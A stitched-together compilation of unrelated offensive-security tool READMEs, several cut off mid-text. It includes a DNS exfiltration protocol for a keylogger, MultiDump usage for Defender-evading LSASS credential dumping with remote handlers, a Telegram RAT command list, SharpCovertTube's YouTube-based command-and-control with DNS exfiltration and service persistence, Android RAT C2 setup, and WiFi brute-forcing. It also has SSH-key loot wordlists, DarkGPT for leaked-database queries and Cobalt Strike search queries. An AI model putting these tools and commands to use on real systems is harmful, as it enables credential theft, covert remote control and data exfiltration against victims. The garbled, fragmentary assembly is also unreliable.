The following is the format to follow for starting a connection: a.1.1.1.[sld].[tld].
The server will respond with an IP address in following format: 123.123.123.[id]
Concurrent connections cannot exceed 254, and clients are never considered "disconnected."
Exfiltrating Data
A record requests starting with b indicate exfiltrated data being sent to the server.
The following is the format to follow for sending data after establishing a connection: b.[packet #].[id].[data].[sld].[tld].
The server will respond with [code].123.123.123
id is the id that was established on connection. Data is sent as ASCII encoded in hex.
code is one of the codes described below.
Response Codes
200: OK
If the client sends a request that is processed normally, the server will respond with code 200.
201: Malformed Record Requests
If the client sends an malformed record request, the server will respond with code 201.
202: Non-Existant Connections
If the client sends a data packet with an id greater than the # of connections, the server will respond with code 202.
203: Out of Order Packets
If the client sends a packet with a packet id that doesn't match what is expected, the server will respond with code 203. Clients and servers should reset their packet numbers to 0. Then the client can resend the packet with the new packet id.
204 Reached Max Connection
If the client attempts to create a connection when the max has reached, the server will respond with code 204.
Dropped Packets
Clients should rely on responses as acknowledgements of received packets. If they do not receive a response, they should resend the same payload.
Side Notes
Linux
Log File
The log file containing user inputs contains ASCII control characters, such as backspace, delete, and carriage return. If you print the contents using something like cat, you should select the appropriate option to print ASCII control characters, such as -v for cat, or open it in a text-editor.
Non-Interactive Shells
The keylogger relies on script, so the keylogger won't run in non-interactive shells.
Windows
Repeated Requests
For some reason, the Windows Dns_Query_A always sends duplicate requests. The server will process it fine because it discards repeated packets.
MultiDump is a post-exploitation tool written in C for dumping and extracting LSASS memory discreetly, without triggering Defender alerts, with a handler written in Python.
Blog post: https://xre0us.io/posts/multidump
MultiDump supports LSASS dump via ProcDump.exe or comsvc.dll, it offers two modes: a local mode that encrypts and stores the dump file locally, and a remote mode that sends the dump to a handler for decryption and analysis.
-p Path to save procdump.exe, use full path. Default to temp directory -l Path to save encrypted dump file, use full path. Default to current directory -r Set ip:port to connect to a remote handler --procdump Writes procdump to disk and use it to dump LSASS --nodump Disable LSASS dumping --reg Dump SAM, SECURITY and SYSTEM hives --delay Increase interval between connections to for slower network speeds -v Enable v erbose mode
MultiDump defaults in local mode using comsvcs.dll and saves the encrypted dump in the current directory. Examples: MultiDump.exe -l C:\Users\Public\lsass.dmp -v MultiDump.exe --procdump -p C:\Tools\procdump.exe -r 192.168.1.100:5000
options: -h, --help show this help message and exit -r REMOTE, --remote REMOTE Port to receive remote dump file -l LOCAL, --local LOCAL Local dump file, key needed to decrypt --sam SAM Local SAM save, key needed to decrypt --security SECURITY Local SECURITY save, key needed to decrypt --system SYSTEM Local SYSTEM save, key needed to decrypt -k KEY, --key KEY Key to decrypt local file --override-ip OVERRIDE_IP Manually specify the IP address for key generation in remote mode, for proxied connection
As with all LSASS related tools, Administrator/SeDebugPrivilege priviledges are required.
The handler depends on Pypykatz to parse the LSASS dump, and impacket to parse the registry saves. They should be installed in your enviroment. If you see the error All detection methods failed, it's likely the Pypykatz version is outdated.
By default, MultiDump uses the Comsvc.dll method and saves the encrypted dump in the current directory.
MultiDump.exe ... [i] Local Mode Selected. Writing Encrypted Dump File to Disk... [i] C:\Users\MalTest\Desktop\dciqjp.dat Written to Disk. [i] Key: 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e
If --procdump is used, ProcDump.exe will be writtern to disk to dump LSASS.
In remote mode, MultiDump connects to the handler's listener.
./ProcDumpHandler.py -r 9001 [i] Listening on port 9001 for encrypted key...
MultiDump.exe -r 10.0.0.1:9001
The key is encrypted with the handler's IP and port. When MultiDump connects through a proxy, the handler should use the --override-ip option to manually specify the IP address for key generation in remote mode, ensuring decryption works correctly by matching the decryption IP with the expected IP set in MultiDump -r.
An additional option to dump the SAM, SECURITY and SYSTEM hives are available with --reg, the decryption process is the same as LSASS dumps. This is more of a convenience feature to make post exploit information gathering easier.
Building MultiDump
Open in Visual Studio, build in Release mode.
Customising MultiDump
It is recommended to customise the binary before compiling, such as changing the static strings or the RC4 key used to encrypt them, to do so, another Visual Studio project EncryptionHelper, is included. Simply change the key or strings and the output of the compiled EncryptionHelper.exe can be pasted into MultiDump.c and Common.h.
Self deletion can be toggled by uncommenting the following line in Common.h:
#define SELF_DELETION
To further evade string analysis, most of the output messages can be excluded from compiling by commenting the following line in Debug.h:
//#define DEBUG
MultiDump might get detected on Windows 10 22H2 (19045) (sort of), and I have implemented a fix for it (sort of), the investigation and implementation deserves a blog post itself: https://xre0us.io/posts/saving-lsass-from-defender/
This is an evolution of the original getAllParams extension for Burp. Not only does it find more potential parameters for you to investigate, but it also finds potential links to try these parameters on, and produces a target specific wordlist to use for fuzzing. The full Help documentation can be found here or from the Help icon on the GAP tab.
TL;DR
Installation
Visit Jython Offical Site, and download the latest stand alone JAR file, e.g. jython-standalone-2.7.3.jar.
Open Burp, go to Extensions -> Extension Settings -> Python Environment, set the Location of Jython standalone JAR file and Folder for loading modules to the directory where the Jython JAR file was saved.
On a command line, go to the directory where the jar file is and run java -jar jython-standalone-2.7.3.jar -m ensurepip.
Download the GAP.py and requirements.txt from this project and place in the same directory.
Go to the Extensions -> Installed and click Add under Burp Extensions.
Select Extension type of Python and select the GAP.py file.
Using
Just select a target in your Burp scope (or multiple targets), or even just one subfolder or endpoint, and choose extension GAP:
Or you can right click a request or response in any other context and select GAP from the Extensions menu.
Then go to the GAP tab to see the results:
IMPORTANT Notes
If you don't need one of the modes, then un-check it as results will be quicker.
If you run GAP for one or more targets from the Site Map view, don't have them expanded when you run GAP... unfortunately this can make it a lot slower. It will be more efficient if you run for one or two target in the Site Map view at a time, as huge projects can have consume a lot of resources.
If you want to run GAP on one of more specific requests, do not select them from the Site Map tree view. It will be a lot quicker to run it from the Site Map Contents view if possible, or from proxy history.
It is hard to design GAP to display all controls for all screen resolutions and font sizes. I have tried to deal with the most common setups, but if you find you cannot see all the controls, you can hold down the Ctrl button and click the GAP logo header image to remove it to make more space.
The Words mode uses the beautifulsoup4library and this can be quite slow, so be patient!
In Depth Instructions
Below is an in-depth look at the GAP Burp extension, from installing it successfully, to explaining all of the features.
NOTE: This video is from 16th July 2023 and explores v3.X, so any features added after this may not be featured.
TODO
Get potential parameters from the Request that Burp doesn't identify itself, e.g. XML, graphql, etc.
Add an option to not add the Tentaive Issues, e.g. Parameters that were found in the Response (but not as query parameters in links found).
Improve performance of the link finding regular expressions.
Include the Request/Response markers in the raised Sus parameter Issues if I can find a way to not make performance really bad!
Deal with other size displays and font sizes better to make sure all controls are viewable.
If multiple Site Map tree targets are selected, write the files more efficiently. This can take forever in some cases.
Use an alternative to beautifulsoup4 that is faster to parse responses for Words.
Good luck and good hunting! If you really love the tool (or any others), or they helped you find an awesome bounty, consider BUYING ME A COFFEE! β (I could use the caffeine!)
99.99% are secured by a secondary Windows login screen.
"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"
C2 Infrastructure
CobaltStrike Servers
product:"cobalt strike team server"product:"Cobalt Strike Beacon"ssl.cert.serial:146473198 - default certificate serial number ssl.jarm:07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1ssl:foren.zik
During reconaissance phase or when doing OSINT , we often use google dorking and shodan and thus the idea of Dorkish. Dorkish is a Chrome extension tool that facilitates custom dork creation for Google and Shodan using the builder and it offers prebuilt dorks for efficient reconnaissance and OSINT engagement.
2- Go to chrome://extensions/ and enable the Developer mode in the top right corner. 3- click on Load unpacked extension button and select the dorkish folder.
Note: For firefox users , you can find the extension here : https://addons.mozilla.org/en-US/firefox/addon/dorkish/
Features
Google dorking
Builder with keywords to filter your google search results.
Prebuilt dorks for Bug bounty programs.
Prebuilt dorks used during the reconnaissance phase in bug bounty.
Prebuilt dorks for exposed files and directories
Prebuilt dorks for logins and sign up portals
Prebuilt dorks for cyber secruity jobs
Shodan dorking
Builder with filter keywords used in shodan.
Varierty of prebuilt dorks to find IOT , Network infrastructure , cameras , ICS , databases , etc.
Usage
Once you have found or built the dork you need, simply click it and click search. This will direct you to the desired search engine, Shodan or Google, with the specific dork you've entered. Then, you can explore and enjoy the results that match your query.
TODO
Add more useful dorks and catogories
Fix some bugs
Add a search bar to search through the results
Might add some LLM models to build dorks
Notes
I have built some dorks and I have used some public resources to gather the dorks , here's few : - https://github.com/lothos612/shodan - https://github.com/TakSec/google-dorks-bug-bounty
Warning
I am not responsible for any damage caused by using the tool
/start - start pyradm /help - help /shell - shell commands /sc - screenshot /download - download (abs. path) /info - system info /ip - public ip address and geolocation /ps - process list /webcam 5 - record video (secs) /webcam - screenshot from camera /fm - filemanager /fm /home or /fm C:\ /mic 10 - record audio from mic /clip - get clipboard data Press button to download file Send any file as file for upload to target
DarkGPT is an artificial intelligence assistant based on GPT-4-200K designed to perform queries on leaked databases. This guide will help you set up and run the project on your local environment.
Prerequisites
Before starting, make sure you have Python installed on your system. This project has been tested with Python 3.8 and higher versions.
Environment Setup
Clone the Repository
First, you need to clone the GitHub repository to your local machine. You can do this by executing the following command in your terminal:
git clone https://github.com/luijait/DarkGPT.git cd DarkGPT
Configure Environment Variables
You will need to set up some environment variables for the script to work correctly. Copy the .env.example file to a new file named .env:
DEHASHED_API_KEY="your_dehashed_api_key_here"
Install Dependencies
This project requires certain Python packages to run. Install them by running the following command:
pip install -r requirements.txt 4. Then Run the project: python3 main.py
GTFOcli it's a Command Line Interface for easy binaries search commands that can be used to bypass local security restrictions in misconfigured systems.
Installation
Using go:
go install github.com/cmd-tools/gtfocli@latest
Using homebrew:
brew tap cmd-tools/homebrew-tap brew install gtfocli
This script changes the MAC address of the network interface to a randomly generated address on system startup using crontab. It then uses the macchanger command to generate a list of MAC address vendors and selects one at random and then combines that vendor prefix with a randomly generated suffix to create the new MAC address.
Note: This tool is intended for educational purposes only. It is not intended for any malicious activities or any other illegal activities. By using this tool, you agree to the terms and conditions set forth in the disclaimer and accept full responsibility for any misuse of the tool. The author of this tool is not liable for any damages or losses resulting from the use or misuse of this tool by anyone.
a handful of tweaks and ideas to safeguard the JWT payload, making it futile to attempt decoding by constantly altering its value, ensuring the decoded output remains unintelligible while imposing minimal performance overhead.
What is a JWT Token?
A JSON Web Token (JWT, pronounced "jot") is a compact and URL-safe way of passing a JSON message between two parties. It's a standard, defined in RFC 7519. The token is a long string, divided into parts separated by dots. Each part is base64 URL-encoded.
What parts the token has depends on the type of the JWT: whether it's a JWS (a signed token) or a JWE (an encrypted token). If the token is signed it will have three sections: the header, the payload, and the signature. If the token is encrypted it will consist of five parts: the header, the encrypted key, the initialization vector, the ciphertext (payload), and the authentication tag. Probably the most common use case for JWTs is to utilize them as access tokens and ID tokens in OAuth and OpenID Connect flows, but they can serve different purposes as well.
Primary Objective of this Code Snippet
This code snippet offers a tweak perspective aiming to enhance the security of the payload section when decoding JWT tokens, where the stored keys are visible in plaintext. This code snippet provides a tweak perspective aiming to enhance the security of the payload section when decoding JWT tokens. Typically, the payload section appears in plaintext when decoded from the JWT token (base64). The main objective is to lightly encrypt or obfuscate the payload values, making it difficult to discern their meaning. The intention is to ensure that even if someone attempts to decode the payload values, they cannot do so easily.
userid
The code snippet targets the key named "userid" stored in the payload section as an example.
The choice of "userid" stems from its frequent use for user identification or authentication purposes after validating the token's validity (e.g., ensuring it has not expired).
The idea behind attempting to obscure the value of the key named "userid" is as follows:
Encryption:
The timestamp is hashed and then encrypted by performing bitwise XOR operation with the user ID.
XOR operation is performed using a symmetric key.
The resulting value is then encoded using Base64.
Decryption:
Encrypted data is decoded using Base64.
Decryption is performed by XOR operation with the symmetric key.
The original user ID and hashed timestamp are revealed in plaintext.
The user ID part is extracted by splitting at the "|" delimiter for relevant use and purposes.
Symmetric Key for XOR Encoding:
Various materials can be utilized for this key.
It could be a salt used in conventional password hashing, an arbitrary random string, a generated UUID, or any other suitable material.
However, this key should be securely stored in the database management system (DBMS).
and..^^
in the example, the key is shown as { 'userid': 'random_value' }, making it apparent that it represents a user ID.
However, this is merely for illustrative purposes.
In practice, a predetermined and undisclosed name is typically used. For example, 'a': 'changing_random_value'
Notes
This code snippet is created for educational purposes and serves as a starting point for ideas rather than being inherently secure.
It provides a level of security beyond plaintext visibility but does not guarantee absolute safety.
Attempting to tamper with JWT tokens generated using this method requires access to both the JWT secret key and the XOR symmetric key used to create the UserID.
And...
If you find this helpful, please the "star":star2: to support further improvements.
preview
# python3 main.py
- Current Unix Timestamp: 1709160368 - Current Unix Timestamp to Human Readable: 2024-02-29 07:46:08
This repository contains a collection of wordlists to aid in locating or brute-forcing SSH private key file names. These wordlists can be useful for penetration testers, security researchers, and anyone else interested in assessing the security of SSH configurations.
Wordlist Files π
ssh-priv-key-loot-common.txt: Default and common naming conventions for SSH private key files.
ssh-priv-key-loot-medium.txt: Probable file names without backup file extensions.
ssh-priv-key-loot-extended.txt: Probable file names with backup file extensions.
ssh-priv-key-loot-*_w_gui.txt: Includes file names simulating Ctrl+C and Ctrl+V on servers with a GUI.
Usage π
These wordlists can be used with tools such as Burp Intruder, Hydra, custom python scripts, or any other bruteforcing tool that supports custom wordlists. They can help expand the scope of your brute-forcing or enumeration efforts when targeting SSH private key files.
nomore403 is an innovative tool designed to help cybersecurity professionals and enthusiasts bypass HTTP 40X errors encountered during web security assessments. Unlike other solutions, nomore403 automates various techniques to seamlessly navigate past these access restrictions, offering a broad range of strategies from header manipulation to method tampering.
Prerequisites
Before you install and run nomore403, make sure you have the following: - Go 1.15 or higher installed on your machine.
Installation
From Releases
Grab the latest release for your OS from our Releases page.
Compile from Source
If you prefer to compile the tool yourself:
git clone https://github.com/devploit/nomore403 cd nomore403 go get go build
Customization
To edit or add new bypasses, modify the payloads directly in the payloads folder. nomore403 will automatically incorporate these changes.
./nomore403 -h Command line application that automates different ways to bypass 40X codes.
Usage: nomore403 [flags]
Flags: -i, --bypass-ip string Use a specified IP address or hostname for bypassing access controls. Injects this IP in headers like 'X-Forwarded-For'. -d, --delay int Specify a delay between requests in milliseconds. Helps manage request rate (default: 0ms). -f, --folder string Specify the folder location for payloads if not in the same directory as the executable. -H, --header strings Add one or more custom headers to requests. Repeatable flag for multiple headers. -h, --help help for nomore403 --http Use HTTP instead of HTTPS for requests defined in the request file. -t, --http-method string Specify the HTTP method for the request (e.g., GET, POST). Default is 'GET'. -m, --max-goroutines int Limit the maximum number of concurrent goroutines to manage load (default: 50). (default 50) --no-banner Disable the display of the startup banner (default: banner shown). -x, --proxy string Specify a proxy server for requests, e.g., 'http://server:port'. --random-agent Enable the use of a randomly selected User-Agent. -l, --rate-limit Halt requests upon encountering a 429 (rate limit) HTTP status code. -r, --redirect Automatically follow redirects in responses. --request-file string Load request configuration and flags from a specified file. -u, --uri string Specify the target URL for the request. -a, --user-agent string pecify a custom User-Agent string for requests (default: 'nomore403'). -v, --verbose Enable verbose output for detailed request/response logging.
Contributing
We welcome contributions of all forms. Here's how you can help:
Report bugs and suggest features.
Submit pull requests with bug fixes and new features.
Security Considerations
While nomore403 is designed for educational and ethical testing purposes, it's important to use it responsibly and with permission on target systems. Please adhere to local laws and guidelines.
License
nomore403 is released under the MIT License. See the LICENSE file for details.
WinFiHack is a recreational attempt by me to rewrite my previous project Brute-Hacking-Framework's main wifi hacking script that uses netsh and native Windowsscripts to create a wifi bruteforcer. This is in no way a fast script nor a superior way of doing the same hack but it needs no external libraries and just Python and python scripts.
Installation
The packages are minimal or nearly none π . The package install command is:
pip install rich pyfiglet
Thats it.
Features
So listing the features:
Overall Features:
We can use custom interfaces or non-default interfaces to run the attack.
Well-defined way of using netsh and listing and utilizing targets.
Upgradeability
Code-Wise Features:
Interactive menu-driven system with rich.
versatility in using interface, targets, and password files.
The user is required to provide the network interface for the tool to use.
By default, the interface is set to Wi-Fi.
Search and Set Target:
The user must search for and select the target network.
During this process, the tool performs the following sub-steps:
Disconnects all active network connections for the selected interface.
Searches for all available networks within range.
Input Password File:
The user inputs the path to the password file.
The default path for the password file is ./wordlist/default.txt.
Run the Attack:
With the target set and the password file ready, the tool is now prepared to initiate the attack.
Attack Procedure:
The attack involves iterating through each password in the provided file.
For each password, the following steps are taken:
A custom XML configuration for the connection attempt is generated and stored.
The tool attempts to connect to the target network using the generated XML and the current password.
To verify the success of the connection attempt, the tool performs a "1 packet ping" to Google.
If the ping is unsuccessful, the connection attempt is considered failed, and the tool proceeds to the next password in the list.
This loop continues until a successful ping response is received, indicating a successful connection attempt.
How to run this
After installing all the packages just run python main.py rest is history π make sure you run this on Windows cause this won't work on any other OS. The interface looks like this:
Β
Contributions
For contributions: - First Clone: First Clone the repo into your dev env and do the edits. - Comments: I would apprtiate if you could add comments explaining your POV and also explaining the upgrade. - Submit: Submit a PR for me to verify the changes and apprive it if necessary.
SharpCovertTube is a program created to control Windows systems remotely by uploading videos to Youtube.
The program monitors a Youtube channel until a video is uploaded, decodes the QR code from the thumbnail of the uploaded video and executes a command. The QR codes in the videos can use cleartext or AES-encrypted values.
It has two versions, binary and service binary, and it includes a Python script to generate the malicious videos. Its purpose is to serve as a persistence method using only web requests to the Google API.
It will check the Youtube channel every a specific amount of time (10 minutes by default) until a new video is uploaded. In this case, we upload "whoami.avi" from the folder example-videos:
After finding there is a new video in the channel, it decodes the QR code from the video thumbnail, executes the command and the response is base64-encoded and exfiltrated using DNS:
This works also for QR codes with AES-encrypted payloads and longer command responses. In this example, the file "dirtemp_aes.avi" from example-videos is uploaded and the content of c:\temp is exfiltrated using several DNS queries:
Logging to a file is optional but you must check the folder for that file exists in the system, the default value is "c:\temp\.sharpcoverttube.log". DNS exfiltration is also optional and can be tested using Burp's collaborator:
As an alternative, I created this repository with scripts to monitor and parse the base64-encoded DNS queries containing the command responses.
Configuration
There are some values you can change, you can find them in Configuration.cs file for the regular binary and the service binary. Only the first two have to be updated:
channel_id (Mandatory!!!): Get your Youtube channel ID from here.
api_key (Mandatory!!!): To get the API key create an application and generate the key from here.
payload_aes_key (Optional. Default: "0000000000000000"): AES key for decrypting QR codes (if using AES). It must be a 16-characters string.
payload_aes_iv (Optional. Default: "0000000000000000"): IV key for decrypting QR codes (if using AES). It must be a 16-characters string.
seconds_delay (Optional. Default: 600): Seconds of delay until checking if a new video has been uploaded. If the value is low you will exceed the API rate limit.
debug_console (Optional. Default: true): Show debug messages in console or not.
log_to_file (Optional. Default: true): Write debug messages in log file or not.
TYPE (-t) must be "qr" for payloads in cleartext or "qr_aes" if using AES encryption.
FILE (-f) is the path where the video is generated.
COMMAND (-c) is the command to execute in the system.
AESKEY (-k) is the key for AES encryption, only necessary if using the type "qr_aes". It must be a string of 16 characters and the same as in Program.cs file in SharpCovertTube.
AESIV (-i) is the IV for AES encryption, only necessary if using the type "qr_aes". It must be a string of 16 characters and the same as in Program.cs file in SharpCovertTube.
Examples
Generate a video with a QR value of "whoami" in cleartext in the path c:\temp\whoami.avi:
python generate_video.py -t qr -f c:\temp\whoami.avi -c whoami
Generate a video with an AES-encrypted QR value of "dir c:\windows\temp" with the key and IV "0000000000000000" in the path c:\temp\dirtemp_aes.avi:
You can find the code to run it as a service in the SharpCovertTube_Service folder. It has the same functionalities except self-deletion, which would not make sense in this case.
It possible to install it with InstallUtil, it is prepared to run as the SYSTEM user and you need to install it as administrator:
InstallUtil.exe SharpCovertTube_Service.exe
You can then start it with:
net start "SharpCovertTube Service"
In case you have administrative privileges this may be stealthier than the ordinary binary, but the "Description" and "DisplayName" should be updated (as you can see in the image above). If you do not have those privileges you can not install services so you can only use the ordinary binary.
Notes
File must be 64 bits!!! This is due to the code used for QR decoding, which is borrowed from Stefan Gansevles's QR-Capture project, who borrowed part of it from Uzi Granot's QRCode project, who at the same time borrowed part of it from Zakhar Semenov's Camera_Net project (then I lost track). So thanks to all of them!
This project is a port from covert-tube, a project I developed in 2021 using just Python, which was inspired by Welivesecurity blogs about Casbaneiro and Numando malwares.
Mobile Helper Framework is a tool that automates the process of identifying the framework/technology used to create a mobile application. Additionally, it assists in finding sensitive information or provides suggestions for working with the identified platform.
How work?
The tool searches for files associated with the technologies used in mobile application development, such as configuration files, resource files, and source code files.
Example
Cordova
Search files:
index.html cordova.js cordova_plugins.js
React Native Android & iOS
Search file
Andorid files:
libreactnativejni.so index.android.bundle
iOS files:
main.jsbundle
Installation
βA minimum of Java 8 is required to run Apktool.
==>>Searching possible interesting words in the file
results.........
==>>Searching Private Keys in the file
results.........
==>>Searching high confidential secrets
results.........
==>>Searching possible sensitive URLs in js files
results.........
==>>Searching possible endpoints in js files results.........
Features
This tool uses Apktool for decompilation of Android applications.
This tool renames the .ipa file of iOS applications to .zip and extracts the contents.
Feature
Note
Cordova
React Native
Native JavaScript
Flutter
Xamarin
JavaScript beautifier
Use this for the first few occasions to see better results.
β
β
β
Identifying multiple sensitive information
IPs, Private Keys, API Keys, Emails, URLs
β
β
β
β
Cryptographic Functions
β
β
β
β
β
Endpoint extractor
β
β
β
β
β
Automatically detects if the code has been beautified.
β
β
β
Extracts automatically apk of devices/emulator
β
β
β
β
β
Patching apk
β
Extract an APK from a bundle file.
β
β
β
β
β
Detect if JS files are encrypted
β
β
Detect if the resources are compressed.
β
Hermesβ
β
β
XALZβ
Detect if the app is split
β
β
β
β
β
What is patching apk: This tool uses Reflutter, a framework that assists with reverse engineering of Flutter apps using a patched version of the Flutter library.
More information: https://github.com/Impact-I/reFlutter
Split APKs is a technique used by Android to reduce the size of an application and allow users to download and use only the necessary parts of the application.
Instead of downloading a complete application in a single APK file, Split APKs divide the application into several smaller APK files, each of which contains only a part of the application such as resources, code libraries, assets, and configuration files.
BloodHound is a monolithic web application composed of an embedded React frontend with Sigma.js and a Go based REST API backend. It is deployed with a Postgresql application database and a Neo4j graph database, and is fed by the SharpHound and AzureHound data collectors.
BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory or Azure environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to identify quickly. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory or Azure environment.
The easiest way to get up and running is to use our pre-configured Docker Compose setup. The following steps will get BloodHound CE up and running with the least amount of effort.
Install Docker Compose and ensure Docker is running. This should be included with the Docker Desktop installation
Run curl -L https://ghst.ly/getbhce | docker compose -f - up
Locate the randomly generated password in the terminal output of Docker Compose
In a browser, navigate to http://localhost:8080/ui/login. Login with a username of admin and the randomly generated password from the logs
NOTE: going forward, the default docker-compose.yml example binds only to localhost (127.0.0.1). If you want to access BloodHound outside of localhost, you'll need to follow the instructions in examples/docker-compose/README.md to configure the host binding for the container.
Installation Error Handling
If you encounter a "failed to get console mode for stdin: The handle is invalid." ensure Docker Desktop (and associated Engine is running). Docker Desktop does not automatically register as a startup entry.
If you encounter an "Error response from daemon: Ports are not available: exposing port TCP 127.0.0.1:7474 -> 0.0.0.0:0: listen tcp 127.0.0.1:7474: bind: Only one usage of each socket address (protocol/network address/port) is normally permitted." this is normally attributed to the "Neo4J Graph Database - neo4j" service already running on your local system. Please stop or delete the service to continue.
# Verify if Docker Engine is Running docker info
# Attempt to stop Neo4j Service if running (on Windows) Stop-Service "Neo4j" -ErrorAction SilentlyContinue
A successful installation of BloodHound CE would look like the below:
Introducing Tiny File Manager [WH1Z-Edition], the compact and efficient solution for managing your files and folders with enhanced privacy and security features. Gone are the days of relying on external resources β I've stripped down the code to its core, making it truly lightweight and perfect for deployment in environments without internet access or outbound connections.
Designed for simplicity and speed, Tiny File Manager [WH1Z-Edition] retains all the essential functionalities you need for storing, uploading, editing, and managing your files directly from your web browser. With a single-file PHP setup, you can effortlessly drop it into any folder on your server and start organizing your files immediately.
What sets Tiny File Manager [WH1Z-Edition] apart is its focus on privacy and security. By removing the reliance on external domains for CSS and JS resources, your data stays localized and protected from potential vulnerabilities or leaks. This makes it an ideal choice for scenarios where data integrity and confidentiality are paramount, including RED TEAMING exercises or restricted server environments.
Requirements
PHP 5.5.0 or higher.
Fileinfo, iconv, zip, tar and mbstring extensions are strongly recommended.
How to use
Download ZIP with latest version from master branch.
Simply transfer the "tinyfilemanager-wh1z.php" file to your web hosting space β it's as easy as that! Feel free to rename the file to whatever suits your needs best.
:warning: Caution: Before use, it is imperative to establish your own username and password within the $auth_users variable. Passwords are encrypted using password_hash().
βΉοΈ You can generate a new password hash accordingly: Login as Admin -> Click Admin -> Help -> Generate new password hash
:warning: Caution: Use the built-in password generator for your privacy and security. π
To enable/disable authentication set $use_auth to true or false.
:loudspeaker: Key Features
:cd: Open Source, lightweight, and incredibly user-friendly
:iphone: Optimized for mobile devices, ensuring a seamless touch experience
:information_source: Core functionalities including file creation, deletion, modification, viewing, downloading, copying, and moving
:arrow_double_up: Efficient Ajax Upload functionality, supporting drag & drop, URL uploads, and multiple file uploads with file extension filtering
:file_folder: Intuitive options for creating both folders and files
:gift: Capability to compress and extract files (zip, tar)
:sunglasses: Flexible user permissions system, based on session and user root folder mapping
:floppy_disk: Easy copying of direct file URLs for streamlined sharing
:pencil2: Integration with Cloud9 IDE, offering syntax highlighting for over 150+ languages and a selection of 35+ themes
:page_facing_up: Seamless integration with Google/Microsoft doc viewer for previewing various file types such as PDF/DOC/XLS/PPT/etc. Files up to 25 MB can be previewed using the Google Drive viewer
:zap: Backup functionality, IP blacklist/whitelist management, and more
:mag_right: Powerful search capabilities using datatable js for efficient file filtering
:file_folder: Ability to exclude specific folders and files from the listing
:globe_with_meridians: Multi-language support (32+ languages) with a built-in translation feature, requiring no additional files
Move server files to /var/www/html/ and install dependencies console mv moukthar/Server/* /var/www/html/ cd /var/www/html/c2-server composer install cd /var/www/html/web\ socket/ composer install The default credentials are username: android and password: the rastafarian in you
Set database credentials in c2-server/.env and web socket/.env
Execute database.sql
Start web socket server or deploy as service in linux console php Server/web\ socket/App.php # OR sudo mv Server/websocket.service /etc/systemd/system/ sudo systemctl daemon-reload sudo systemctl enable websocket.service sudo systemctl start websocket.service
Modify /etc/apache2/apache2.confxml <Directory /var/www/html/c2-server> Options -Indexes DirectoryIndex app.php AllowOverride All Require all granted </Directory>
Set C2 server and web socket server address in client functionality/Utils.java ```java public static final String C2_SERVER = "http://localhost";
public static final String WEB_SOCKET_SERVER = "ws://localhost:8080"; ``` - Compile APK using Android Studio and deploy to target
A script to automate keystrokes through an active remote desktop session that assists offensive operators in combination with living off the land techniques.
About RKS (RemoteKeyStrokes)
All credits goes to nopernik for making it possible so I took it upon myself to improve it. I wanted something that helps during the post exploitation phase when executing commands through a remote desktop.
Help Menu
$ ./rks.sh -h Usage: ./rks.sh (RemoteKeyStrokes) Options: -c, --command <command | cmdfile> Specify a command or a file containing to execute -i, --input <input_file> Specify the local input file to transfer -o, --output <output_file> Specify the remote output file to transfer -m, --method <method> Specify the file transfer or execution method (For file transfer "base64" is set by default if not specified. For execution method "none" is set by default if not specified)
-p, --platform <operating_system> Specify the operating system (windows is set by default if not specified)
-w, --windowname <name> Specify t he window name for graphical remote program (freerdp is set by default if not specified)
-h, --help Display this help message
Usage
Internal Reconnaissance
When running in command prompt
$ cat recon_cmds.txt whoami /all net user net localgroup Administrators net user /domain net group "Domain Admins" /domain net group "Enterprise Admins" /domain net group "Domain Computers" /domain
$ ./rks.h -c recon_cmds.txt
Execute Implant
Execute an implant while reading the contents of the payload in powershell.